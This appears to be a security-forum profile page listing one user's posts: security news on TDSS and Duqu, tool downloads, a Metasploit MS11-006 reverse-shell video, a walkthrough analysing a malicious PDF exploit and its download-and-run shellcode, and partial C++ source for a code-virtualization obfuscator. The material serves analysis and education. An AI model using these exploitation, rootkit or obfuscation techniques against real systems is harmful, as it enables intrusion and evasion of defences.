Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. PHP Vulnerability Hunter 1.1.4.6 Authored by AutoSec Tools | Site autosectools.com PHP Vulnerability Hunter is a PHP fuzzing tool that scans for several different vulnerabilities by performing dynamic program analysis. It can detect arbitrary command execution, local file inclusion, arbitrary upload, and several other types of vulnerabilities. Changes: Added code coverage report. Updated GUI validation. Several instrumentation fixes. Fixed lingering connection issue. Fixed GUI and report viewer crashes related to working directory. Download: http://packetstormsecurity.org/files/download/107074/phpvh1.1.4.6.zip
  2. World's stealthiest rootkit pushes DNS hijacking trojan DNS Changer dropped by TDSS By Dan Goodin Posted in Malware, 14th November 2011 21:49 GMT One of the world's most advanced pieces of malware is being used to spread DNS Changer, a trojan at the heart of a massive click fraud scheme that has already hijacked 4 million PCs, security researchers said. Just a few days after federal prosecutors in the US shuttered the international conspiracy, researchers from Dell SecureWorks said they discovered DNS Changer is being spread by TDSS. The rootkit, as previously reported, is among the hardest to detect and remove and is often used as a means to install keyloggers, tools for attacking websites, and other malware. Once installed, DNS Changer is able to alter the DNS, or domain name system, settings that computers and routers use to find the IP numbers that correspond to domain names such as theregister.co.uk and google.com. By replacing legitimate DNS servers with servers under the control of the attackers, they are able to send victims to fraudulent websites instead of the destinations the victims intended to visit. Last week, seven people from Estonia and Russia were criminally charged in a scam that for more than five years used DNS Charger to generate more than $14 million in profit. They racked up the windfall by redirecting victims to imposter websites that paid advertising fees to the attackers each time they were clicked on. The scheme preyed on users of computers running Microsoft Windows and Apple OS X operating systems. DNS Changer is also able to change DNS configuration settings in certain routers, particularly when they use default usernames and passwords. The ability of TDSS to evade antivirus protection and other security software is well documented. The rootkit, which is also known as TDL4 and Aleureon, is among the world's most advanced, with the ability to infect 64-bit versions of Windows, infect a computer's master boot record, and communicate over the Kad peer-to-peer network. It's newest payload means that victims now have an easy way to tell if they are infected. "The real danger of a DNS Changer infection is that it is an indicator that your system is infected with a larger malware cocktail with malware such as Rogue AV, Zeus Banking Trojan, Spam Bot, etc." an emailed report from Dell SecureWorks stated. "Controlling DNS literally gives an attacker complete access to a system." End users who want to know if their systems are infected should check the DNS server settings of their operating system and routers. Compromised systems will show server IP addresses within the following ranges: 85.255.112.0 through 85.255.127.255 67.210.0.0 through 67.210.15.255 93.188.160.0 through 93.188.167.255 77.67.83.0 through 77.67.83.255 213.109.64.0 through 213.109.79.255 64.28.176.0 through 64.28.191.255 To check DNS settings on Windows open a command prompt and type "ipconfig /all" and then check the DNS Server field. On a Mac, choose System Preferences and then select Network. Then click on the Advanced button of the active connection. Users may also want to check the DNS servers used by their router. FBI officials said 4 million PCs were infected by the DNS Changer used in the operation that was shut down last week. The Dell SecureWorks report said researchers aren't sure if that number is accurate. Researchers monitoring the command and control servers used in the attack are seeing about 600,000 unique IP addresses connect per day. Sursa: World's stealthiest rootkit pushes DNS hijacking trojan ? The Register
  3. Introduction to Linux Kernel 2.6 How to write a Rootkit Maurice Leclaire TumFUG Linux / Unix get-together January 19, 2011 Why hacking the kernel? I Understanding the Linux kernel I Fixing bugs I Adding special features I Writing drivers for special hardware I Writing rootkits Download: http://info.fs.tum.de/images/2/21/2011-01-19-kernel-hacking.pdf
  4. Jason Warner Interview About Ubuntu 12.04 Desktop Marius Nestor - Softpedia During the Ubuntu Development Summit for Ubuntu 12.04 LTS, Jason Warner, Ubuntu Desktop Manager at Canonical, gave an interview to Amber Graner, an Ubuntu contributor involved in the community since February 2009. In the interview, Jason Warner talks about the desktop interface in the upcoming Ubuntu 12.04 LTS (Precise Pangolin) and what users should expect from it. Jason Warner says that users will find a more tweaked and bug free Unity interface in Ubuntu 12.04 LTS, as well as an overall quality and very stable release. In the 5 minutes interview, Jason Warner was also asked about his team, user feedback and contributons, and the next Long Term Support release, Ubuntu 14.04 LTS. You can watch the entire, 5 minutes and 13 seconds long, interview with Jason Warner, Ubuntu Desktop Manager at Canonical, right here on this page, at the top. Enjoy! Video: http://www.youtube.com/watch?v=o1SgMKZ7T9Q&feature=player_embedded#! Sursa: Jason Warner Interview About Ubuntu 12.04 Desktop - Softpedia
  5. 7 Facts On Duqu Malware Attacks Research into Duqu malware finds a component compiled in 2007, but identified successful attacks that occurred as recent as April 2011. By Mathew J. Schwartz InformationWeek November 16, 2011 11:25 AM New information continues to emerge about the Duqu malware that was designed to steal information relating to industrial control systems. The latest analysis of the Duqu malware has found that one of the components used in the attack was compiled in 2007. But Duqu was used in a targeted attack as recently as April 2011, pointing to a possible four-year attack campaign by Duqu's authors, whose identities and affiliations remain unknown. What is known, however, is that to date, Duqu infected organizations in at least eight countries--including Iran--in part by using a still-unpatched Windows zero-day vulnerability. Furthermore, as researchers continue to study Duqu variants, these findings have emerged: 1. Duqu was a boutique exploit. To date, researchers have discovered "12 unique sets of Duqu files," said Alexander Gostev, chief security expert at Kaspersky Lab and author of a recent Duqu report. That's significant, since "for every victim, a separate set of attack files was created," he said via email. 2. Duqu relates to Stars. According to a Duqu timeline assembled by Kaspersky Lab, Duqu appeared at the same time as the Stars virus hit Iran. "At that time Iranian specialists didn't share samples of the discovered virus with any of the antivirus companies, and this, it has to be said, was a serious mistake, which gave rise to all subsequent events in this saga," said Gostev. "Most probably, the Iranians found a keylogger module that had been loaded onto a system and which contained a photo of the NGC 6745 galaxy. This could explain the title 'Stars' given to it." 3. Attackers covered their tracks. Pointing to the difficulty of tracing attacks back to the actual people who launched them, Gostev said that the Duqu exploits, which used malicious .doc files attached to emails, "took place from anonymous mailboxes, probably via compromised computers." In the case of one particular attack, dubbed "variant F" by Kaspersky, attackers used a computer--again, likely compromised--in South Korea to send attack emails on April 17, 2011, followed by another attack four days later. The first attack ended up in a junk mail folder. "The second attack turned out successful: the addressee opened the attached .doc file that contained the vulnerability exploit and Trojan installer," said Gostev. 4. Exploit used Dexter font. How did Duqu attack? For the Duqu-F variant at least, "the vulnerability exploit was contained in the font called 'Dexter Regular,' said Gostev. But that attack code was only a dropper or installer program, which then downloaded further attack code onto the targeted PC. "After penetration into a system the attackers installed extra modules and infected neighboring computers," he said. 5. Duqu used a ruse. Interestingly, after infecting a PC, Duqu did nothing--at least initially--except residing in memory and staying put even if the .doc file was closed. "This period of inactivity lasted around 10 minutes, after which the exploit waited for the user's activity to stop--no keyboard or mouse activity. Only then did the dropper kick into action," said Gostev. 6. Attackers used disposable control servers. Each Duqu variant had its own, separate control server, which provides further evidence that it was a highly targeted attack. Having a disposable infrastructure, furthermore, helped ensure that the discovery of one Duqu variant or attack wouldn't give away any of the others. Unlike Shady RAT's masterminds, the Duqu attackers also appear to have left the control servers active only for as long as they were required. Indeed, for a control server used to launch the Duqu-F attack, "we think that it is not functioning now and all critical information on it has already been deleted by the attackers," said Gostev. Kaspersky likewise found an identical data-wipe after researching another Duqu variant. 7. Duqu contained communication backups. Duqu can connect not just to command-and-control (C&C) servers, but also function as a server itself. "There are two lists of C&C servers, one can contain domain names, IP addresses, or names of network shares, and the other contains IP addresses in binary format and is used to connect using Windows HTTP (winhttp) services," according to a report published by Kasperksy Lab expert Igor Soumenkov. "Although the configuration blocks we have found so far are similar and are set up to connect to its C&C using HTTP and HTTPS, the payload .dll [file] is able to connect to a network share and even become a server." In other words, while Duqu may have only attacked a handful of organizations, it was engineered to succeed. Sursa: 7 Facts On Duqu Malware Attacks - Security - Attacks/breaches - Informationweek
  6. Duplicate Lines Remover Easily delete duplicate lines from files. Duplicate Lines Remover is a handy freeware application which allows you to easily remove duplicate lines from files and strings. You can specify to ignore empty lines, remove empty lines and enable sorting of items. Is also possible to add the application to the SendTo menu for easily remove duplicate lines from files present in the hard drive. Duplicate Lines Remover is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7 Screenshots Features Add to SendTo menu Commandline version Compatible with BOTH 32-bit and 64-bit OS Ignore empty lines Remove duplicate lines from files Remove duplicate lines from strings Remove empty lines Sort lines of a file Very user-friendly GUI Details Version: 1.2.0.0 Operating System: Windows All | 32-bit and 64-bit Last Update: 17.11.2011 Category: Security License: Freeware Download: http://downloads.novirusthanks.org/files/duplicate_lines_remover.exe Sursa: Duplicate Lines Remover - Easily remove duplicate lines from files and strings
  7. Vmfs Recovery Recover Data from Vmfs Disks Vmfs Recovery offers a safe, easy way to recover information stored on VMFS-formatted disks. Like any other storage media, VMware disks can get damaged by software and hardware faults. Bad blocks and physical corruption of hard drives storing the virtual disk images can also cause corruption to VMware images. Recover Information from Healthy and Damaged VMFS Drives Vmfs Recovery can recover data from healthy and corrupted virtual disk images used by VMware vSphere 5, ESX/ESXi VMware® ESX Server? in fully automated mode. As VMware employs VMFS, its very own file system to store virtual machines, Vmfs Recovery works equally well in quick and full recovery modes. Recover VMDK Disks from ESX Servers Recovering VMDK images from ESX servers is a two-step process. First, Vmfs Recovery will repair the ESX/ESXi storage to gain access to individual virtual PCs stores in these partitions. After that, individual virtual machines represented with their VMDK disks can be extracted, and a standard data recovery process can be launched. Recover VMware Partitions from Damaged Hard Drives and Faulty RAID Arrays VMFS disks can be recovered from damaged, corrupted and inaccessible physical hard drives and RAID arrays, including corrupted RAIDs and broken arrays with or without the original RAID controller installed. Fully Automated VMFS Recovery VMFS disks can be recovered from damaged, corrupted and inaccessible physical hard drives and RAID arrays, including corrupted RAIDs and broken arrays with or without the original RAID controller installed. What Can Be Recovered VMDK images from healthy and corrupted VMFS disks created in all versions of ESX Server or VMware VMFS drives stored on working or faulty RAID arrays, with or without the original RAID controller present VMFS drives stored on corrupted and inaccessible hard drives VMDK images stored in disks formatted by VMware® ESX Server? Compatibility VMFS partitions created in VMware vSphere 5 and ESX/ESXi VMware® ESX Server? VMFS3 and VMFS5 support Supports files up to 2TB VMFS5 drives with more than 100,000 files VMFS partitions up to 64TB Unicode file names in VMFS5 VMFS drives stored on all types of RAID arrays including RAID JBOD, 0, 1, 1E, RAID 4, RAID 5, RAID 5R, 0+1 and 1+0 VMFS partitions stored on hardware and integrated RAID arrays Runs in all versions of Windows 7, 2008 R1/R2, Vista/XP/2000 Features Two modes of operation: quick and full recovery Fully guided, step-by-step recovery wizard Saves recovered files and folders on local or remote locations Supports FTP upload and can burn recovered data onto CD & DVD discs Can mount virtual disks to system as drive letters (will be accessible with Explorer and all other browsers and file utilities) Recovers information bypassing Windows access restrictions Supports long and international file names and folders with multiple sub-folders Recovers VMDK images from corrupted VMFS partitions stored on corrupted RAID arrays with or without the original RAID controller Supports all the features of Raid Recovery Compatibility Diskinternals Vmfs Recovery supports VMFS partitions created in VMware vSphere 5 and ESX/ESXi drives created in VMware® ESX Server?. Vmfs Recovery supports Windows 7 and 2008 Server R1/R2, as well as Windows 2000, XP, 2003 Server, and Windows Vista. All types of internal and external hard drives and RAID arrays are supported, with or without the original RAID controller. Free Download Diskinternals Vmfs Recovery is available as a free evaluation. Get your copy now. Download: http://www.diskinternals.com/download/Vmfs_Recovery.exe Sursa: Recover Data from VMFS, ESX, ESXi, vSphere Disks
  8. Acunetix Web Vulnerability Scanner 8 BETA Released The next stage in the evolution of Acunetix Web Vulnerability Scanner has arrived — WVS 8 BETA! Many of you have been biting their nails in anticipation of this Beta, so sit tight and read on for the next most important stage in the evolution of Acunetix WVS. Version 8 of Web Vulnerability Scanner has been optimized to make life easier at every stage of a security scan. WVS is easier to use for web admins and security analysts alike: enhanced automation, ability to save scan settings as a template to avoid reconfiguration, and multiple instance support for simultaneous scans of several websites. WVS 8 also ushers in a new exciting co-operation between Acunetix and Imperva: developers of the industry’s leading Web Application Firewall. Download: http://www.acunetix.com/vulnerability-scanner/vulnerabilityscanner8.exe Sursa: http://thehackernews.com/2011/11/acunetix-web-vulnerability-scanner-8.html
  9. Using Ms11-006 To Create Honeypot Description: This video using buffer overflow exploit found in Microsoft Windows thumbnail folder view setting. this uses MS11-006 exploit found in Metaploit and a meterpreter payload to create a reverse connection back thru the victim's firewall, to the attacker. Notice that the file is never opened Va recomand sa il vedeti. http://www.securitytube.net/video/2456 http://vimeo.com/32105952
  10. Unemployed Romanian hacker accused of breaking into NASA
  11. Prostie. 1) Nu elibereaza memoria, nu are cum ci dimpotriva, incearca sa aloce foarte multa 2) Cred ca e un "0" in plus 3) Foarte probabil va rezulta un "Out of string space" Sau poate ma insel si e un algoritm foarte complex care cauta memory leak-uri si actioneaza ca un Garbage collector general descoprind lipsa referintelor la date alocate...
  12. Ai dat Quick format?
  13. List of Free Sandboxes for Malware Analysis! by MAYURESH on NOVEMBER 15, 2011 We had done a similar post - way back in 2009 - titled List of Online Malware Scanners. Cut to the end of 2011, we now bring you a list of free sandboxes for malware analysis. Most of them are free and open source products. However, we also have included a few commercial versions and those that can be installed on your system. First, as it always has been a tradition at PenTestIT, let us know what actually malware analysis means: Malware analysis simply means study of malicious programs via code analysis, behaviour analysis or a combination of both these techniques. But where does a sandbox fit in? It helps you in automated behaviour analysis. We like to elongate a sandbox as follows - System And Network Detection Box (as in a system). So, now that we know a bit about malware analysis with sandboxes, lets see the list of free sandboxes for malware analysis. GFI ThreatTrack GFI Sandbox (formerly CWSandbox) is an industry leading dynamic malware analysis tool. It gives you the power to analyze virtually any Windows application or file including infected: Office documents, PDF’s, malicious URL’s and Flash ads. Once you submit your sample below we will email you an executive level PDF and an XML report containing all the behavior information gathered during analysis. – http://www.threattrack.com/ CWSandbox – CWSandbox is an approach to automatically analyze malware which is based on behavior analysis: malware samples are executed for a finite time in a simulated environment, where all system calls are closely monitored. From these observations, CWSandbox is able to automatically generate a detailed report which greatly simplifies the task of a malware analyst. – http://www.mwanalysis.org/ ThreatExpert ThreatExpert is an advanced automated threat analysis system designed to analyze and report the behavior of computer viruses, worms, trojans, adware, spyware, and other security-related risks in a fully automated mode. In only a few minutes ThreatExpert can process a sample and generate a highly detailed threat report with the level of technical detail that matches or exceeds antivirus industry standards such as those normally found in online virus encyclopedias. – http://www.threatexpert.com/ Xandora – xandora.net is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of xandora.net results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching. It is the ideal tool for a person to get a quick understanding of the purpose of an unknown binary. – http://www.xandora.net/xangui/ Anubis: Anubis is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of Anubis results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system, about interactions with the Windows Service Manager or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching i.e. analyzing its execution. The analysis focuses on the security-relevant aspects of a program’s actions, which makes the analysis process easier and because the domain is more fine-grained it allows for more precise results. It is the ideal tool for the malware and virus interested person to get a quick understanding of the purpose of an unknown binary. – http://anubis.iseclab.org/ Comodo Camas – CAMAS stands for Comodo Automated Malware Analysis System. – http://camas.comodo.com/ Norman SandBox – http://www.norman.com/security_center/security_tools/ Malbox Malbox is a service for malware analysis. Submit your Windows executable(*.exe) or compressed(*.zip)(name the file you want to analysis as “main.exe”)files and you will receive an analysis report telling you what it does, or submit a suspicious URL and you will receive a report that shows you all the activities of the Internet Explorer process when visiting this URL. – http://malbox.xjtu.edu.cn/ DELL SecureWorks Truman: Truman can be used to build a “sandnet”, a tool for analyzing malware in an environment that is isolated, yet provides a virtual Internet for the malware to interact with. It runs on native hardware, therefore it is not stymied by malware which can detect VMWare and other VMs. The major stumbling block to not using VMs is the difficulty involved with repeatedly imaging machines for re-use. Truman automates this process, leaving the researcher with only minimal work to do in order to get an initial analysis of a piece of malware. Truman consists of a Linux boot image (originally based on Chas Tomlin’s Windows Image Using Linux) and a collection of scripts. Also provided is pmodump, a Perl-based tool to reconstruct the virtual memory space of a process from a PhysicalMemory dump. With this tool it is possible to circumvent most packers to perform strings analysis on the dumped malware. – http://www.secureworks.com/research/tools/truman/ Cuckoo Sandbox: Cuckoo provides you with a fully automated system able to fetch files, analyze them inside an isolated virtualized Windows system and return back results. We covered the Cuckoo Sandbox here – http://www.pentestit.com/cuckoo-malware-analysis-sandbox/. Buster Sandbox Analyzer: It is a tool that has been designed to analyze the behaviour of processes and the changes made to system and then evaluate if they are malware suspicious.The changes made to system can be of several types: file system changes, registry changes and port changes. We covered Buster Sandbox Analyzer here – http://www.pentestit.com/buster-sandbox-analyzer-malware-analyzer/ BitBlaze: The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to analyze and develop novel common off-the-shelf protection and diagnostic mechanisms and analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation. – http://bitblaze.cs.berkeley.edu/ Minibis: http://www.cert.at/downloads/software/minibis_en.html Zero Wine Malware Analysis Tool: Zero Wine is a malware’s behavior analysis tool. Just upload your suspicious PE file (windows executable) through the web interface and let it analyze the behaviour of the process. - http://sourceforge.net/projects/zerowine/ Zero Wine Tryouts: Zero Wine Tryouts is an open source malware analysis tool.Just upload your suspicious file (e.g. Windows executable file, PDF file) through the web interface and let it analyze. The Zero Wine Tryouts project is a fork of the original Zero Wine project. – http://zerowine-tryout.sourceforge.net/ Norman Malware Analyzer G2*commercial: Malware Analyzer G2 is the next generation of malware analysis from the inventors of SandBox, voted “Most Innovative Idea in the Past 10 Years” by security researchers at the VB2010 Conference. Analyzer G2 Hybrid SandBoxing combines the benefits of the entirely emulated SandBox environment with IntelliVM monitoring with KernelScout to offer intelligence to unmatched by any other product. – http://www.norman.com/products/sandbox_malware_analyzers/en GFI SandBox*commercial: GFI SandBox (formerly CWSandbox) is an industry leading dynamic malware analysis tool. It gives you the power to analyze virtually any Windows application or file including infected: Office documents, PDFs, malicious URLs, Flash ads and custom applications.Targeted attacks, hacked websites, malicious Office documents, infected email attachments and social engineering are all part of the Internet threat landscape today. Only GFI SandBox™ gives you a complete view of every aspect and element of a threat, from infection vector to payload execution. And GFI SandBox can quickly and intelligently identify malicious behavior using Digital Behavior Traits™ technology. – http://www.gfi.com/malware-analysis-tool/ Joe Sandbox*commercial: Joe Sandbox (formerly JoeBox) is a fully automated analysis system for trojans, viruses and rootkits (malware). It requests malicious executables such as PE, PDF (Acrobat Reader) or DOC (Microsoft Word) files as input and returns highly detailed reports describing the behavior of executables beeing executed. The well structured reports show how the malware installs iself, how it communicates with the internet and how it hides its presence. With the help of advanced behavior signatures Joe Sandbox summarizes interesting actions, making the understanding of the behavior extremly easy. Joe Sandbox is suitable for manual as well as for large scale malware analysis. – http://www.joesecurity.org/index.php That is all we’ve got as of now. I know this list a largely un-structured list, but I built it from a text file containing only the links to these products. Again, these are arranged according to my wish. Oh yes, if you know of any more, please let us know! That is why we have opened up the comments system now! Sursa: http://www.pentestit.com/list-sandboxes-malware-analysis/
  14. Analysis of a malicious PDF from a SEO Sploit Pack According to a Kaspersky Lab article, SEO Sploit Pack is one of the Exploit Kits which appeared in the first months of the year, being PDF and Java vulnerabilities the most used in these type of kits. That's the reason why I've chosen to analyse a malicious PDF file downloaded from a SEO Sploit Pack. The PDF file kissasszod.pdf was downloaded from hxxp://marinada3.com/88/eatavayinquisitive.php and it had a low detection rate. So taking a look at the file with peepdf we can see this information: In a quick look we can see that there are Javascript code in object 8 and that the element /AcroForm is probably used to execute something when the document is opened. The next step is to explore these objects and find out what will be executed: We can see that object 8 is located in the /XFA array of the /AcroForm and that the element to be referenced, as the /Field element tells, is yomRote[0].grueLox[0].khfdskjfh[0]. Now it's time to take a close look at object 8, the one containing Javascript code: The tags we have seen in the downward path from the /Fields element show which element will be located in the form: yomRote[0].grueLox[0].khfdskjfh[0]. The names yomRote and grueLox are subforms of the template contained in object 8. Within the subform grueLox we have a field called khfdskjfh, where the Javascript code is located. So we know that certainly this code will be executed: This script is trying to obfuscate the execution of the eval function (line 5), so we could substitute brtd by eval to make it clearer. In line 24 we can see that the returned value from the function oerz will be executed with eval. This function takes as arguments the content of the element khfdskjfh (ignoring the first 50 characters) and the eval function itself. But, where is the content of khfdskjfh? Object 8 defines the structure of the form but the content of that variable is not included, which should be in the downward path from a xfa:datasets element. Taking a look at all the objects of the /XFA array... Object 10 is the winner, the content of khfdskjfh is located there: it seems to be two arrays, one array of arrays and one array of numbers. Taking a look at the function oerz we can understand the function of these arrays. The second array is an argument of oerz and it's stored in the variable axzr, while the first array will be stored in the variable uyj. After this, some characters from the first array will be stored in yjf (those with decimal values between 32-48, 65-97, 48-64, 10-11, 13-14 and 97-126). And finally, the result of using the second array (axzr) as an array of indexes for the variable yjf will be stored in tash. There are some small modifications to do here because some parts of the original code is not executed by Spidermonkey. So after the changes, we can execute it without problems now: The result is a second stage of Javascript code: The function _X is executed in this new Javascript code, used for storing in the element khfdskjfh (line 59) a base64 value depending on the Acrobat Reader version (line 45). Decoding the content we find a TIFF image: This is the trigger of the vulnerability CVE-2010-0188. Just before, the shellcode is passed as parameter for the _L function, used for the heap spraying. The variable _ET (line 57) contains the escaped shellcode and we can obtain the unescaped bytes thanks to these commands: We can suppose that the payload will try to download some type of malware from the URL, but we cannot see any function in the unescaped bytes. This time the command sctest is not useful so another option is to obtain an executable thanks to shellcode2exe by Mario Vilas and take a look in the debugger: Now we can confirm the purpose of the shellcode. It tries to download an executable from the URL (URLDownloadToFileA) to store it in a system temporal directory (GetTempPathA) and finally execute it (WinExec). The URL was offline and we cannot find out what type of malware was downloaded, but looking at the activity of the domain marinada3.com we can suspect that the malware was a ZeuS 2.x. Submitted by jesparza on Mon, 2011/11/14 - 01:03 Sursa: Analysis of a malicious PDF from a SEO Sploit Pack | eternal-todo.com
  15. Hackers attack Wi-Fi at airports and other public places with fake network Nov 16, 2011, 11:20 AM If you are using Wi-Fi at airports and other public places, your account may at risk The hackers set up fake Wi-Fi networks with names like "LAX Free WI-FI", ,enticing people with laptops, smartphones, tablets, or other devices to access the internet through their bogus network. This results in your account compromised. Attackers can get your confidential data. "So if they go to their bank, it will grab all of their banking information," said Cyber security expert Gregory Evans. "If they go to their Facebook, it'll grab all that- their Twitter account. If they're writing love letters, I can grab all of that." Some tips to prevent Wi-Fi hacking: If you're at an airport or other place find out who the Wi-Fi provider is and use that provider even it costs money. If you go online in a public place, someone could be watching or recording you, peaking at personal information, including bank accounts. Experts say change your passwords from time to time and use different passwords for different accounts. Sursa: Hackers attack Wi-Fi at airports and other public places with fake network ~ e Hacking News [EHN] | Hackers News Am postat doar pentru idee, stiu ca o sa faceti la fel.
  16. Recuva File Recovery Accidentally deleted an important file? Lost something important when your computer crashed? No problem! Recuva recovers files deleted from your Windows computer, Recycle Bin, digital camera card, or MP3 player. And it's free! v1.41.537 (10 Oct 2011) - Added content searching for specific text in deleted files. - Added regular expression matching to the filter. - Added preliminary support for Windows 8. - Improved support for BartPE (added new folder creation). - Fixed filter drop down highlight issue. - Improved recovery of compressed files from drives with non-standard cluster size. - Many minor UI improvements. - Latvian language added. Download: http://www.piriform.com/recuva/download
  17. [C++] Simple Code Virtualization (Virtual Machine / Emulator) Original code by: abhe Ported by: steve10120 at ic0de.org Thanks to Edi for help with inst_table Original: ic0de.org /* Original code by: abhe Ported by: steve10120@ic0de.org Thanks to Edi for help with inst_table */ #include <Windows.h> #include <iostream> int const REGISTER_EAX = 0; int const REGISTER_ECX = 1; int const REGISTER_EDX = 2; int const REGISTER_EBX = 3; int const REGISTER_ESP = 4; int const REGISTER_EBP = 5; int const REGISTER_ESI = 6; int const REGISTER_EDI = 7; int const REGISTER_NOP = 8; typedef struct _VMCONTEXT { DWORD EIP; DWORD Reg[8]; } VMCONTEXT, *PVMCONTEXT; typedef void (VM_FUNCTION_CALL)(PVMCONTEXT c); typedef struct _INST { VM_FUNCTION_CALL* FunctionCall; } INST, *PINST; void AddCode(PVMCONTEXT c, BYTE n) { c->EIP += n; } void VRetn(PVMCONTEXT c) { } void VJmp(PVMCONTEXT c) { DWORD imm32; c->EIP++; imm32 = *(PDWORD)c->EIP; c->EIP = imm32; } void VPUSHImm(PVMCONTEXT c) { DWORD imm32; c->EIP++; imm32 = *(PDWORD)c->EIP; AddCode(c, 4); *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } void VPUSHReg(PVMCONTEXT c) { BYTE regflag; DWORD imm32; c->EIP++; regflag = *(PBYTE)c->EIP; AddCode(c, 1); if ( regflag < 8 ) { imm32 = c->Reg[regflag]; *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } } void VPUSHMem(PVMCONTEXT c) { DWORD mem32; DWORD imm32; c->EIP++; mem32 = *(PDWORD)c->EIP; imm32 = *(PDWORD)mem32; AddCode(c, 4); *(PDWORD)c->Reg[REGISTER_ESP] = imm32; c->Reg[REGISTER_ESP] += 4; } void VPOPReg(PVMCONTEXT c) { BYTE regflag; DWORD imm32; c->EIP++; regflag = *(PBYTE)c->EIP; AddCode(c, 1); if ( regflag < 8 ) { imm32 = *(PDWORD)c->Reg[REGISTER_ESP]; c->Reg[REGISTER_ESP] -= 4; c->Reg[regflag] = imm32; } } void VPOPMem(PVMCONTEXT c) { DWORD imm32; DWORD mem32; imm32 = *(PDWORD)c->Reg[REGISTER_ESP]; c->Reg[REGISTER_ESP] -= 4; mem32 = *(PDWORD)c->EIP; AddCode(c, 4); *(PDWORD)mem32 = imm32; } void VMovRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] = c->Reg[SrcReg]; } void VMovRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] = imm32; } void VMovRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] = *(PDWORD)mem32; } void VADDRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] += c->Reg[SrcReg]; } void VADDRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] += imm32; } void VADDRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] += *(PDWORD)mem32; } void VSUBRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] -= c->Reg[SrcReg]; } void VSUBRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] -= imm32; } void VSUBRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if ( DestReg < 8 ) c->Reg[DestReg] -= *(PDWORD)mem32; } void VMulEaxReg(PVMCONTEXT c) { BYTE SrcReg; c->EIP++; SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( SrcReg < 8 ) c->Reg[REGISTER_EAX] *= c->Reg[SrcReg]; } void VDivEaxReg(PVMCONTEXT c) { BYTE SrcReg; c->EIP++; SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( SrcReg < 8 ) { c->Reg[REGISTER_EAX] /= c->Reg[SrcReg]; c->Reg[REGISTER_EAX] %= c->Reg[SrcReg]; } } void VANDRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) && ( SrcReg < 8 ) ) c->Reg[DestReg] &= c->Reg[SrcReg]; } void VAndRegImm(PVMCONTEXT c) { BYTE DestReg; DWORD imm32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); imm32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] &= imm32; } void VAndRegMem(PVMCONTEXT c) { BYTE DestReg; DWORD mem32; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); mem32 = *(PDWORD)c->EIP; AddCode(c, 4); if (DestReg < 8 ) c->Reg[DestReg] &= *(PDWORD)mem32; } void VORRegReg(PVMCONTEXT c) { BYTE DestReg, SrcReg; c->EIP++; DestReg = *(PBYTE)c->EIP; AddCode(c, 1); SrcReg = *(PBYTE)c->EIP; AddCode(c, 1); if ( ( DestReg < 8 ) & ( SrcReg < 8 